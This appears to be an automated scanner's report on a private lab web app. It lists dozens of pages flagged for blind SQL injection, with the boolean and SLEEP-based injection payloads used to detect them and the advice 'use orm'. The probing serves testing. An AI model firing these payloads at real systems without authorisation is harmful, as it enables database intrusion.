Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	99077=99077
	and	23336=23336
	or	65056=65056#
	and	74705=74706
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'23261'='23261
'/**/and/**/'69820'='69820
'/**/or/**/26857=26857#
'/**/and/**/'81059'='81060
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	99077=99077
	and	23336=23336
	or	65056=65056#
	and	74705=74706
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	99077=99077
	and	23336=23336
	or	65056=65056#
	and	74705=74706
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
93727=93727

and
40806=40806

or
8883=8883#

and
37745=37746
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'21157'='21157
'+and+'17255'='17255
'+or+64747=64747#
'+and+'1098'='1099
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'32396'='32396
'	and	'66536'='66536
'	or	77783=77783#
'	and	'62185'='62186
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---